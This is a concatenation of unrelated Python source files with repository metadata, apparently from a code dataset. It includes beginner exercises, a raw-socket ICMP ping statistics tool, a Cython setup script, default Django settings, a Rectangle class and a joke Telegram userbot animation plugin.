fruits.insert(0, input("Enter another fruit: \n\n >>>"))
print("Fruits in list with 'P' in name:")
for fruit in fruits:
if "p" in fruit[0].lower():
print(fruit)
"""
Series 2
Using the list created in series 1 above:
* Display the list.
* Remove the last fruit from the list.
* Display the list.
* Ask the user for a fruit to delete, find it and delete it.
* (Bonus: Multiply the list times two. Keep asking until a match is found. Once found, delete all occurrences.)
"""
display_fruits(fruits)
fruits.pop()
display_fruits(fruits)
delete_fruits(fruits)
display_fruits(fruits)
"""
Series 3
Again, using the list from series 1:
* Ask the user for input displaying a line like “Do you like apples?” for each fruit
in the list (making the fruit all lowercase).
* For each “no”, delete that fruit from the list.
* For any answer that is not “yes” or “no”, prompt the user to answer with one of those
two values (a while loop is good here)
* Display the list.
"""
cleanup_list(fruits)
display_fruits(fruits)
"""
Series 4
Once more, using the list from series 1:
* Make a new list with the contents of the original, but with all the letters in each item reversed.
* Delete the last item of the original list. Display the original list and the copy.
"""
reversed_fruits = [fruit[::-1] for fruit in fruits]
fruits.pop()
print(f"Original list: {fruits}")
print(f"Reversed list: {reversed_fruits}")
if __name__ == '__main__':
main()
| [
"brian_s_ervin@hotmail.com"
] | brian_s_ervin@hotmail.com |
eb8b87f9fd89d79fac86f787705c74ddeba99724 | c65bb08796e5a4880c69223deddfd7685e15889b | /ex40/mystuff.py | 301a33b92d4436d5560e534400e01439c083400e | [] | no_license | cdemeke/Learn-Python-The-Hard-Way | 5f9ff9b87a5c2d8b61c55af318b75ff0a738ed80 | 3e7b2d13657bb1c77e9bcd95c7a105e2fd23914d | refs/heads/master | 2021-01-01T05:37:18.909735 | 2014-12-06T00:32:38 | 2014-12-06T00:32:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | def apple():
print "I AM APPLES!"
tangerine = "Living reflection of a dream"
class MyStuff(object):
def __init__(self):
self.tangerine = "And now a thousand years between"
def apple(self):
print "I AM CLASSY APPLLES!"
| [
"demeke2@gmail.com"
] | demeke2@gmail.com |
8266cfb6cd8c7007d5ace9e2bb96a4ea77988892 | 07ef6594a8ba03e64b9acf56f7a11dbf0057a25a | /ping_sweep/reference_ideas/ping_C.py | ff4b2b6c481c836588ead503a0f2328d500270fd | [
"BSD-2-Clause-Views"
] | permissive | Python3pkg/Ping_Sweep | 75fe3c1497bb14ebf412f09a983b67e26b286f60 | 323487b32e747ee35d4d50e3ed0ae6ebb487b42d | refs/heads/master | 2021-01-21T17:41:10.186951 | 2017-05-21T18:53:27 | 2017-05-21T18:53:27 | 91,979,995 | 0 | 0 | null | 2017-05-21T18:50:52 | 2017-05-21T18:50:52 | null | UTF-8 | Python | false | false | 13,825 | py | #!/usr/bin/env python
"""
A pure python ping implementation using raw socket.
Note that ICMP messages can only be sent from processes running as root.
Derived from ping.c distributed in Linux's netkit. That code is
copyright (c) 1989 by The Regents of the University of California.
That code is in turn derived from code written by Mike Muuss of the
US Army Ballistic Research Laboratory in December, 1983 and
placed in the public domain. They have my thanks.
Bugs are naturally mine. I'd be glad to hear about them. There are
certainly word - size dependenceies here.
Copyright (c) Matthew Dixon Cowles, <http://www.visi.com/~mdc/>.
Distributable under the terms of the GNU General Public License
version 2. Provided with no warranties of any sort.
Original Version from Matthew Dixon Cowles:
-> ftp://ftp.visi.com/users/mdc/ping.py
Rewrite by Jens Diemer:
-> http://www.python-forum.de/post-69122.html#69122
Rewrite by George Notaras:
-> http://www.g-loaded.eu/2009/10/30/python-ping/
Revision history
~~~~~~~~~~~~~~~~
December 18, 2009
-----------------
awolfson@amperion.com
amperion.com
Alex Wolfson:
Added tracking of duplicate ICMPs
Added sending multiple pings from a thread scheduled with defined interval.
Added printing histogram
Added command line options
November 8, 2009
----------------
Improved compatibility with GNU/Linux systems.
Fixes by:
* George Notaras -- http://www.g-loaded.eu
Reported by:
* Chris Hallman -- http://cdhallman.blogspot.com
Changes in this release:
- Re-use time.time() instead of time.clock(). The 2007 implementation
worked only under Microsoft Windows. Failed on GNU/Linux.
time.clock() behaves differently under the two OSes[1].
[1] http://docs.python.org/library/time.html#time.clock
May 30, 2007
------------
little rewrite by Jens Diemer:
- change socket asterisk import to a normal import
- replace time.time() with time.clock()
- delete "return None" (or change to "return" only)
- in checksum() rename "str" to "source_string"
November 22, 1997
-----------------
Initial hack. Doesn't do much, but rather than try to guess
what features I (or others) will want in the future, I've only
put in what I need now.
December 16, 1997
-----------------
For some reason, the checksum bytes are in the wrong order when
this is run under Solaris 2.X for SPARC but it works right under
Linux x86. Since I don't know just what's wrong, I'll swap the
bytes always and then do an htons().
December 4, 2000
----------------
Changed the struct.pack() calls to pack the checksum and ID as
unsigned. My thanks to Jerome Poincheval for the fix.
Last commit info:
~~~~~~~~~~~~~~~~~
$LastChangedDate: $
$Rev: $
$Author: $
IP Header
bit offset 0-3 4-7 8-15 16-18 19-31
0 Version Header length Differentiated Services Total Length
32 Identification Flags Fragment Offset
64 Time to Live Protocol Header Checksum
96 Source Address
128 Destination Address
160 Options/Data
RFC792, echo/reply message:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ...
+-+-+-+-+-
"""
import os, sys, socket, struct, select, time, threading, traceback
import collections
from optparse import OptionParser
#import pprint
#pp = pprint.PrettyPrinter(indent=4)
#from multiprocessing import Process
# From /usr/include/linux/icmp.h; your milage may vary.
ICMP_ECHO_REQUEST = 8 # Seems to be the same on Solaris.
'''
sentPings -> sequence:time
records are created during the send and delited during the receive
printStat() deletes records that are timed out
'''
sentPings = {}
statLock = threading.Lock()
class pingStatistics:
def reset(self):
self.starttime = time.time()
self.transmitted = 0
self.received = 0
self.duplicated = 0
self.missed = 0
self.pending = 0
self.min = 10000.0
self.max = 0.0
self.totaltime = 0.0
self.exceedmaxtime = 0
self.lastPrinttime = time.time()
if hasattr(self, 'hist'):
self.hist = [0 for h in self.hist]
def __init__(self, dest_addr, points):
self.reset()
self.dest_addr = dest_addr
self.points = points
self.hist = [0] * (len(self.points)+1)
# self.printafter = 10
def updateStat(self, val):
'''
update a histogram with val
points is a sorted list
@return: new histogram
'''
# statLock.acquire()
valms = val * 1000
i = 0
for p in self.points:
if valms >= p:
i += 1
else:
break
self.hist[i] += 1
self.totaltime += val
self.received += 1
if self.min > val:
self.min = val
if self.max < val:
self.max = val
# statLock.release()
def printHist(self):
for h in self.hist:
print "%10d" % (h),
print "\n" + " "*7,
for p in self.points:
print "%10.3f" % (p),
print "\n"
def printStat(self):
print "---- " + self.dest_addr + " ping statistics ----"
statLock.acquire()
currentTime = time.time()
pending = 0
# print sentPings
pings = sentPings.keys()
for seq in pings:
tm = sentPings[seq]
if (currentTime - tm > options.timeout) and tm > self.starttime:
# print 'before print del %d'%seq
del sentPings[seq]
# print 'after print del %d'%seq
self.missed += 1
else:
pending += 1
# print 'after for loop'
statLock.release()
print "time = %f sec, %d transmitted, %d received, %d duplicated, %d missed, %d pending, %f min, %f max %d exceed %f ms, " \
% (time.time() - self.starttime, self.transmitted, self.received, self.duplicated, self.missed, pending, self.min * 1000.0, self.max * 1000.0, self.exceedmaxtime , options.maxtime * 1000),
if self.received != 0:
print "%f average" % (self.totaltime / self.received * 1000.0)
else:
print ""
self.printHist()
self.lastPrinttime=currentTime
#global statistics, movingstat, continue_receive, statLock
continue_receive = True
# From http://code.activestate.com/recipes/142812/
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump2(src, length=8):
result=[]
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = ' '.join(["%02X"%ord(x) for x in s])
printable = s.translate(FILTER)
result.append("%04X %-*s %s\n" % (i, length*3, hexa, printable))
return ''.join(result)
def checksum(source_string):
"""
I'm not too confident that this is right but testing seems
to suggest that it gives the same answers as in_cksum in ping.c
"""
sum = 0
countTo = (len(source_string)/2)*2
count = 0
while count<countTo:
thisVal = ord(source_string[count + 1])*256 + ord(source_string[count])
sum = sum + thisVal
sum = sum & 0xffffffff # Necessary?
count = count + 2
if countTo<len(source_string):
sum = sum + ord(source_string[len(source_string) - 1])
sum = sum & 0xffffffff # Necessary?
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
answer = ~sum
answer = answer & 0xffff
# Swap bytes. Bugger me if I know why.
answer = answer >> 8 | (answer << 8 & 0xff00)
return answer
def send_one_ping(my_socket, dest_addr, ID, size):
"""
Send one ping to the given >dest_addr<.
"""
dest_addr = socket.gethostbyname(dest_addr)
# Header is type (8), code (8), checksum (16), id (16), sequence (16)
my_checksum = 0
seqH = statistics.transmitted & 0xffff # sequence has signed short format
# Make a dummy header with a 0 checksum.
header = struct.pack("!bbHHH", ICMP_ECHO_REQUEST, 0, my_checksum, ID, seqH)
bytesInDouble = struct.calcsize("d")
data = (size - bytesInDouble) * "Q"
timeSent = time.time()
data = struct.pack("d", timeSent) + data
# Calculate the checksum on the data and the dummy header.
my_checksum = checksum(header + data)
# Now that we have the right checksum, we put that in. It's just easier
# to make up a new header than to stuff it into the dummy.
header = struct.pack(
"!bbHHH", ICMP_ECHO_REQUEST, 0, my_checksum, ID, seqH
)
packet = header + data
sentPings[seqH] = timeSent
my_socket.sendto(packet, (dest_addr, 1)) # 1 is a port number
statistics.transmitted += 1
movingstat.transmitted += 1
#DEBUG
#if options.verbose > 1:
# print "at %f sent seq=%u" % (timeSent, seqH)
def verbose_receive_one_ping(my_socket, ID, timeout):
"""
receive the ping from the socket.
update statistics
"""
global statLock
timeLeft = timeout
while True:
startedSelect = time.time()
whatReady = select.select([my_socket], [], [], timeLeft)
howLongInSelect = (time.time() - startedSelect)
if whatReady[0] == []: # Timeout
return
timeReceived = time.time()
recPacket, addr = my_socket.recvfrom(2048) #TODO: find a better way to specify size.
icmpHeader = recPacket[20:28]
type, code, checksum, packetID, sequence = struct.unpack(
"!bbHHH", icmpHeader
)
if options.verbose > 2:
print 'recPacket (len = %d)\n' % (len(recPacket)), dump2(recPacket)
if packetID == ID:
if type != 0: #not a reply msg
print "Got not a 'reply' msg: type %d, code %d\n" % (type, code)
continue
bytesInDouble = struct.calcsize("d")
timeSent = struct.unpack("d", recPacket[28:28 + bytesInDouble])[0]
# TODO:update statistic
rtt = timeReceived - timeSent
if options.verbose > 1:
print "at %f received %d bytes from %s: time=%.3f, seq=%u, rtt=%.3f ms" % (timeReceived, len(recPacket),
addr, timeSent - statistics.starttime, sequence, rtt*1000),
statLock.acquire()
if sequence in sentPings:
#print 'receive del'
del sentPings[sequence]
statistics.updateStat(rtt)
movingstat.updateStat(rtt)
if rtt > options.maxtime:
statistics.exceedmaxtime += 1
movingstat.exceedmaxtime += 1
if options.verbose > 1:
print ""
statLock.release()
return rtt
else: # Duplicate ICMP
if options.verbose > 1:
print " (DUP)"
statistics.duplicated += 1
movingstat.duplicated += 1
statLock.release()
return -1
statLock.release()
timeLeft = timeLeft - howLongInSelect
if timeLeft <= 0:
if options.verbose > 1:
print "nothing received in %f sec\n" % (timeout)
# statistics.missed += 1
return
def receive_loop(my_socket, my_ID, timeout):
''' This is a thread routine'''
while continue_receive:
verbose_receive_one_ping(my_socket, my_ID, timeout)
def ping_with_stat(my_socket, dest_addr, my_ID, size, interval, timeout):
send_one_ping(my_socket, dest_addr, my_ID, size)
time.sleep(interval)
def do_many(dest_addr, interval = 1.0, timeout = 1.0, count = 1, size = 56):
"""
sends packets in a main loop with delays.
receive packets from the thread
This allows send packets independently of receiving
Returns either the delay (in seconds) or none on timeout.
"""
global statistics, movingstat
movingstat.reset()
statistics.reset()
icmp = socket.getprotobyname("icmp")
try:
# my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
except socket.error, (errno, msg):
if errno == 1:
# Operation not permitted
msg = msg + (
" - Note that ICMP messages can only be sent from processes"
" running as root."
)
raise socket.error(msg)
raise # raise the original error
my_ID = os.getpid() & 0xFFFF
receiveThread = threading.Thread(target = receive_loop, args = (my_socket, my_ID, timeout))
receiveThread.start()
if count == -1:
i=0
while 1:
if not receiveThread.isAlive():
break
i = i + 1
ping_with_stat(my_socket, dest_addr, my_ID, size, interval, timeout)
if time.time() - movingstat.lastPrinttime >= options.printinterval:
if options.verbose > 0:
movingstat.printStat()
movingstat.reset()
statistics.printStat()
else:
for i in xrange(1, count+1):
if not receiveThread.isAlive():
break
ping_with_stat(my_socket, dest_addr, my_ID, size, interval, timeout)
if time.time() - movingstat.lastPrinttime >= options.printinterval:
if options.verbose > 0:
movingstat.printStat()
movingstat.reset()
statistics.printStat()
continue_receive = False
time.sleep(timeout) # to be sure that all sent pings are processed
receiveThread.join(timeout)
statistics.printStat()
my_socket.close()
#=================================================================
if __name__ == '__main__':
try:
usage = "%prog [options]IP\n %prog -h for more inormation"
parser = OptionParser()
parser.usage = usage
parser.add_option("-c", "--count", dest="count", type='int', help="number of pings. -1: infinity, default=%default", default=-1)
parser.add_option("-i", "--interval", dest="interval", type='float', help="ping interval in sec, default = %default", default = 1.0)
parser.add_option("-t", "--timeout", dest="timeout", type='float', help="ping timeout in sec, default = %default", default = 1.0)
parser.add_option("-p", "--printinterval", dest="printinterval", type='float', help="statistics print interval in sec, default = %default", default = 5.0)
parser.add_option("-s", "--size", dest="size", type='int', help="payload size, default = %default", default = 56)
parser.add_option("-m", "--maxtime", dest="maxtime", type='float', help="numer of ping greater then maxtime sec, default = %default", default = 0.025)
# parser.add_option("-d", "--histdim", dest="histdim", type='int', help="payload size, default = %default", default = 56)
parser.add_option("-g", "--hist", dest="hist", type='float', nargs = 11, help="histogram points, default = %default", default = (5.0, 10.0, 15, 20.0, 30.0, 40.0, 50.0, 100, 200, 300, 500))
parser.add_option("-v", "--verbose", dest="verbose", type='int', help="0: only final stat; 1: final and intermediate stat; \n2: 1 + individual packets, default=%default; 3: 2 + receive packet dump", default=2)
(options, args) = parser.parse_args()
if args == []:
parser.error('Provide Target IP')
targetIP = args[0]
statistics = pingStatistics(targetIP, options.hist)
movingstat = pingStatistics(targetIP, options.hist)
#movingstat.printafter = int(options.printinterval / options.interval)
#if movingstat.printafter < 1: movingstat.printafter = 1
do_many(targetIP, interval = options.interval, timeout = options.timeout, count = options.count, size = options.size)
except ( KeyboardInterrupt):
print
statistics.printStat()
sys.exit(0)
except:
traceback.print_exc()
#raise
finally:
sys.exit(1)
| [
"pierre.villeneuve@gmail.com"
] | pierre.villeneuve@gmail.com |
886eea49aa337110c363a7c50f02dc38adcdecb0 | d710f84e7ac099925fb926527474e59f01da55a9 | /ch09-generative_models/yahmm/setup.py | db193aab9a00323c85f178605855741eb39c310f | [
"Apache-2.0"
] | permissive | skforest/linear_start_code | 838c1d6123202d6fd7531ffd77bf5fcc6fad3b4e | 478a6b236c2e33c4baffec8aafa8e0a8ed68dca8 | refs/heads/master | 2020-07-18T13:54:05.585117 | 2019-09-04T10:06:42 | 2019-09-04T10:06:42 | 206,258,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 864 | py | # -*- coding: UTF-8 -*-
"""
此脚本将使用Cython编译viterbi.pyx
"""
import os
from Cython.Build import cythonize
from distutils.core import setup
import numpy
# Windows下的存储路径与Linux并不相同
# 在Windows下使用Cython请参考https://github.com/cython/cython/wiki/InstallingOnWindows
if os.name == "nt":
setup(
name="yahmm",
description="Yet another hmm implimentation for supervised",
packages=["yahmm"],
ext_modules=cythonize(["hmm\\utils\\viterbi.pyx"]),
requires=["sklearn"],
include_dirs=[numpy.get_include()])
else:
setup(
name="yahmm",
description="Yet another hmm implimentation for supervised",
packages=["yahmm"],
ext_modules=cythonize(["hmm/utils/viterbi.pyx"]),
requires=["sklearn"],
include_dirs=[numpy.get_include()])
| [
"1025284664@qq.com"
] | 1025284664@qq.com |
f828bed2965fc5649b5ddb773d2883da6a7e2660 | 0387ad7384c45e67635f494b866da594970c2917 | /0x0C-python-almost_a_circle/models/rectangle.py | 9fc5bbd228f3c0083aa1b9d254c29a15184a9f88 | [] | no_license | monicajaimesc/holbertonschool-higher_level_programming | 2ef992de0eefd4205df7d98c653ca352b408e91b | ed80e375274d1d8a80882c2e5a7a7df09ae0833e | refs/heads/master | 2020-07-23T01:45:17.542210 | 2020-02-14T03:34:52 | 2020-02-14T03:34:52 | 207,404,393 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,478 | py | #!/usr/bin/python3
"""
Module that contain a Class Rectangle
inherits from Base, private instance attributes
width and height
"""
from models.base import Base
class Rectangle(Base):
"""
Rectangle subclass, inherited from Base Class.
"""
def __init__(self, width, height, x=0, y=0, id=None):
"""
Initialize Class constructor
"""
self.width = width
self.height = height
self.x = x
self.y = y
# Call the super class with id
# this super call use the logic of the __init__ of the Base class
super().__init__(id)
# instance attributes with its own public getter and setter:
@property
def width(self):
"""Getter: get width of the
rectangle"""
return self.__width
# Why not directly public attribute with getter/setter?
# to protect attributes of our class.
# With a setter, you are able to validate
# what a developer is trying to assign to a variable.
# So after, in your class you can “trust” these attributes.
@width.setter
def width(self, value):
""" setter: set the argument value to witdth
Attributes:
__width: width of rectangle
Args:
value: width of rectangle
Raises:
TypeError: width must be an integer
ValueError: width must be >= 0
"""
if type(value) is not int:
raise TypeError('width must be an integer')
if value <= 0:
raise ValueError('width must be > 0')
self.__width = value
@property
def height(self):
"""Height Getter"""
return self.__height
@height.setter
def height(self, value):
"""Setter: set the argumet value to height
Attributes:
__height: the height of rectangle
Args:
value: the height of rectangle
Raises:
TypeError: height must be an integer
ValueError: height must be > 0
"""
if type(value) is not int:
raise TypeError('height must be an integer')
if value <= 0:
raise ValueError('height must be > 0')
self.__height = value
@property
def x(self):
""" X getter """
return self.__x
@x.setter
def x(self, value):
"""Setter: set argument value to x
Attributes:
__x: the x position of rectangle
Args:
value: the x position of rectangle
Raises:
TypeError: x must be an integer
ValueError: x must be >= 0
"""
if type(value) is not int:
raise TypeError('x must be an integer')
if value < 0:
raise ValueError('x must be >= 0')
self.__x = value
@property
def y(self):
"""Getter: get y position of rectangle"""
return self.__y
@y.setter
def y(self, value):
"""Setter: set argument value to y
Attributes:
__y: the y position of rectangle
Args:
value: the y position of rectangle
Raises:
TypeError: y must be an integer
ValueError: y must be >= 0
"""
if type(value) is not int:
raise TypeError('y must be an integer')
if value < 0:
raise ValueError('y must be >= 0')
self.__y = value
def area(self):
""" Public method: calulate the area of
rectangle
Return:
return the area
"""
return self.width * self.height
def display(self):
""" display public method: prints in stdout
the Rectangle instance with the character #
(take in account x and y position)
"""
print(self.y * '\n', end='')
# width = anchura
row = self.x * ' ' + self.width * '#'
# string = (('#' * self.__width) + '\n') * self.__height
# return string[:-1]
print('\n'.join([row for h in range(self.height)]))
def __str__(self):
"""overriding the__str__ method: return a string
Return:
return [Rectangle] (<id>) <x>/<y> - <width>/<height>
"""
return ("[Rectangle] ({}) {}/{} - {}/{}".format(self.id, self.x,
self.y, self.width,
self.height))
def update(self, *args, **kwargs):
"""update public method: update the dictionary
(key/value) argument to each attribute
Args:
Kwargss: CAN BE! a double pointer to a dictionary: key/value
"""
if args and len(args) > 0:
# kwargs is behavior in terms you’re already familiar wit
# **kwargs must be skipped if *args exists and is not empty
# args: non-keyworded variable length argument list to the funtion
for idx, arg in enumerate(args):
# enumerate: Return an enumerate object.
if idx == 0:
# self.id = arg
super().__init__(arg)
if idx == 1:
self.width = arg
if idx == 2:
self.height = arg
if idx == 3:
self.x = arg
if idx == 4:
self.y = arg
# if args not exist
# pass keyworded variable lenght of arguments to a function
# this is a dictionary, use items
elif kwargs and len(kwargs) > 0:
for key, value in kwargs.items():
if key == 'id':
super().__init__(value)
if key == 'width':
self.width = value
if key == 'height':
self.height = value
if key == 'x':
self.x = value
if key == 'y':
self.y = value
def to_dictionary(self):
"""to_dictionary public method: Rectangle instance to dictionary
representation
Return:
returns the dictiory representation of a Rectangle
"""
# attrs_list = ["id", "width", "height", "x", "y"]
# return {key: getattr(self, key) for key in attrs_list}
return {'id': self.id, 'width': self.width, 'height': self.height,
'x': self.x, 'y': self.y}
| [
"monikmaja@gmail.com"
] | monikmaja@gmail.com |
009b4f13692b0d7f54b6afcab42e518641201b36 | b46e1451bae53c36a8bc1b51de985eb5ce3472c0 | /doc_orginal/en/example/py2py3/test_py3.py | d95702a5348ad01e6f11db6fdf5536060bb8bfa9 | [
"MIT"
] | permissive | 19-1-skku-oss/2019-1-OSS-L1 | d0c2eaa4fab205a89ea3b8c1c8383e681ec22b98 | 3c8b78a0aa1f75001967d8e477e1c452c11bc7cb | refs/heads/master | 2021-06-24T17:12:08.137915 | 2020-12-09T08:35:24 | 2020-12-09T08:35:24 | 181,665,631 | 3 | 5 | MIT | 2020-09-03T23:45:18 | 2019-04-16T10:14:56 | Python | UTF-8 | Python | false | false | 104 | py | def test_exception_syntax():
try:
0 / 0
except ZeroDivisionError as e:
assert e
| [
"37352771+mjyoo2@users.noreply.github.com"
] | 37352771+mjyoo2@users.noreply.github.com |
66bc1e90fe7cca9c35983b5f447c943e4ff61a43 | 17b36a72ec5d6287499d9468dbeafbc5bcbbd5fc | /plant_base/settings.py | 7585b1e6f0392b408b1187856653dd9382df8d13 | [
"MIT"
] | permissive | nord-PRJ/plant-base | 95be30c4e5f31e7f0c836725fda0b02c3b196d23 | 183060bef9e6fb85730db4549c89127be390d7d1 | refs/heads/master | 2020-03-07T22:38:28.836973 | 2018-04-02T17:56:05 | 2018-04-02T17:56:05 | 127,759,594 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,100 | py | """
Django settings for plant_base project.
Generated by 'django-admin startproject' using Django 2.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7cx#rf%m01j6_cm0wgq3vi1@qtzew*#-ds*%^#pj679*(cc-q+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'plant_base.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'plant_base.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"ttkay123@gmail.com"
] | ttkay123@gmail.com |
72d8d8ac47ceb9f682800efef9aa102bd121eab5 | caa06eca3eef2549d5088f6487201f734b35822e | /NLP-PGN/utils/config_bak.py | 538451b3b9977af8e798069ab9f3e4cf5672d3bb | [] | no_license | kelvincjr/shared | f947353d13e27530ba44ea664e27de51db71a5b6 | 4bc4a12b0ab44c6847a67cbd7639ce3c025f38f8 | refs/heads/master | 2023-06-23T19:38:14.801083 | 2022-05-17T09:45:22 | 2022-05-17T09:45:22 | 141,774,490 | 6 | 1 | null | 2023-06-12T21:30:07 | 2018-07-21T02:22:34 | Python | UTF-8 | Python | false | false | 1,767 | py | """
@Time : 2021/2/814:06
@Auth : 周俊贤
@File :config.py
@DESCRIPTION:
"""
from typing import Optional
import torch
# General
hidden_size: int = 512
dec_hidden_size: Optional[int] = 512
embed_size: int = 512
pointer = True
# Data
max_vocab_size = 20000
embed_file: Optional[str] = None # use pre-trained embeddings
source = 'big_samples' # use value: train or big_samples
data_path: str = './data/data/train.txt'
val_data_path = './data/data/dev.txt'
test_data_path = './data/data/test.txt'
stop_word_file = './data/data/HIT_stop_words.txt'
max_src_len: int = 300 # exclusive of special tokens such as EOS
max_tgt_len: int = 100 # exclusive of special tokens such as EOS
truncate_src: bool = True
truncate_tgt: bool = True
min_dec_steps: int = 30
max_dec_steps: int = 100
enc_rnn_dropout: float = 0.5
enc_attn: bool = True
dec_attn: bool = True
dec_in_dropout = 0
dec_rnn_dropout = 0
dec_out_dropout = 0
# Training
trunc_norm_init_std = 1e-4
eps = 1e-31
learning_rate = 0.001
lr_decay = 0.0
initial_accumulator_value = 0.1
epochs = 8
batch_size = 8 #16
coverage = False
fine_tune = False
scheduled_sampling = False
weight_tying = False
max_grad_norm = 2.0
is_cuda = True
DEVICE = torch.device("cuda" if is_cuda else "cpu")
LAMBDA = 1
output_dir = "./output"
if pointer:
if coverage:
if fine_tune:
model_name = 'ft_pgn'
else:
model_name = 'cov_pgn'
elif scheduled_sampling:
model_name = 'ss_pgn'
elif weight_tying:
model_name = 'wt_pgn'
else:
if source == 'big_samples':
model_name = 'pgn_big_samples'
else:
model_name = 'pgn'
else:
model_name = 'baseline'
# Beam search
beam_size: int = 3
alpha = 0.2
beta = 0.2
gamma = 0.6
| [
"deco_2004@163.com"
] | deco_2004@163.com |
caa70a1c20c09c9c6b6377119336bac1cfa74b9e | 7ef2e648c7d256a5b2b867eb0562da4a482de164 | /polygraph/types/tests/test_union.py | 5ff82e4f688f1a5ad8a2f07bf95688f10ae7cbcc | [
"MIT"
] | permissive | pombredanne/polygraph-3 | 6a57c60835dcbf1dfde5f5893160c3d9c08b9dbe | f6b187e23f3c5adc8571ea844ec95e69451831f8 | refs/heads/master | 2021-01-24T08:21:57.822485 | 2017-05-19T11:45:06 | 2017-05-19T11:45:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | # FIXME: Unions can only accept Object Types
| [
"wlee@mathspace.co"
] | wlee@mathspace.co |
ca6ae37debcd45faf6aa52776adf01ee5c14bd29 | 729c7fa3b4b357b270378113b490c52d47aa5bda | /stdplugins/call.py | 4c09b1bac8886ff22cb5a9337bc294e89008b1b5 | [
"Apache-2.0"
] | permissive | Hopsins/PornHub | 277ba3104ea4e4b5955871656558edde97f6ef4c | eb4eed9e18bdace04a948321186804330e809ddd | refs/heads/master | 2020-07-09T16:00:01.660358 | 2019-08-22T16:35:35 | 2019-08-22T16:35:35 | 199,866,577 | 0 | 0 | Apache-2.0 | 2019-07-31T13:56:02 | 2019-07-31T13:56:01 | null | UTF-8 | Python | false | false | 1,813 | py | """Emoji
Available Commands:
.emoji shrug
.emoji apple
.emoji :/
.emoji -_-"""
from telethon import events
import asyncio
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 5
animation_ttl = range(0, 18)
input_str = event.pattern_match.group(1)
if input_str == "/cull":
await event.edit(input_str)
animation_chars = [
"`Connecting To Telegram Headquarters...`",
"`Call Connected.`",
"`Telegram: Hello This is Telegram HQ. Who is this?`",
"`Me: Yo this is` @r4v4n4 ,`Please Connect me to Pavel Durov Shukla`",
"`User Authorised.`",
"`Calling Pavel Durov Shukla (@durov) At +916969696969`",
"`Private Call Connected...`",
"`Me: Hello Sir, Please Ban This Telegram Account.`",
"`Durov: May I Know Who Is This?`",
"`Me: Yo Brah, I Am` @r4v4n4",
"`Durov: OMG!!! I Am FAN Of You Sir...\nI'll Make Sure That Guy Account Will Get Blocked Within 24Hrs.`",
"`Me: Thanks, See You Later Brah.`",
"`Durov: Please Don't Thank Sur, Telegram Is Your's. Just Gimme A Call When You Become Free.`",
"`Me: Is There Any Issue/Emergency???`",
"`Durov: Yes Sur, There Is A Bug In Telegram v5.8.0.\nI Am Not Able To Fix It. If Possible, Please Help Fix The Bug.`",
"`Me: Send Me The App On My Telegram Account, I Will Fix The Bug & Send You.`",
"`Durov: Sure Sur \nTC Bye Bye :)`",
"`Private Call Disconnected.`"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
